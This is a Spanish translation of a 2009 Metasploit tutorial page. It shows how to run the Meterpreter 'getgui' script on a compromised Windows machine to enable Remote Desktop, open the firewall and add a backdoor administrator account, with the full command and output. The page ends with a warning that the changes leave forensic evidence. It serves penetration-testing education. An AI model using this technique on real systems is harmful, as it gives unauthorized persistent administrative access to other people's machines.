Habilitando Escritorio Remoto
De www.metasploit-es.com.ar
Habilitando Escritorio Remoto
Veamos otra situación en la que Metasploit nos hace muy fácil el trabajo de apertura de puertas malvadas utilizando nada más que herramientas integradas en el sistema. Vamos a utilizar el script 'getgui' de Carlos Perez, habilitaremos el escritorio remoto (Remote Desktop), y crearemos una cuenta nueva para acceder con ella.
La utilización de este script no podía de ninguna manera ser mas fácil de lo que ya es.... así que:
meterpreter > run getgui -u hax0r -p gibs0n [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Enabling Remote Desktop [*] RDP is disabled enabling it ... [*] Setting Terminal Services service startup mode [*] The Terminal Services service is not set to auto, changing it to auto ... [*] Opening port in local firewall if necessary [*] Setting user account for logon [*] Adding User: hax0r with Password: gibs0n [*] Adding User: hax0r to local group Remote Desktop Users [*] Adding User: hax0r to local group Administrators [*] You can now login with the created user meterpreter >
Ya está, hemos terminado :D, es verdad. Comprueba la conexión para que veas que es así de fácil.
Aquí vemos que si que era fácil si. Se utilizó el comando rdesktop y se especifico el User y Pass que queremos utilizar para el login. Entonces hemos recibido un mensaje de advertencia que nos hace saber que un usuario ya ha iniciado sesión en la consola del sistema, y que si le damos a continuar el usuario se desconectara. Este es el comportamiento esperado para un sistema de escritorio de Windows XP, para que podáis ver que todo funciona como esperábamos. Tenga en cuenta que Windows Server permite logins gráficos lo que resulta que no encontraras este mensaje de advertencia.
Recuerda que estos tipos cambios son muy poderosos. Pero debes utilizarlos con sabiduría y cautela,pero mucha, debido a que todos estos pasos alteran los sistemas de manera que puedan ser utilizados por los investigadores para rastrear qué tipo de medidas y acciones se realizaron en el sistema.
Mientras mas cambios hagas... mas pruebas dejaras atrás.
© Offensive Security 2009
Original by www.offensive-security.com Traslated by FreeInfo
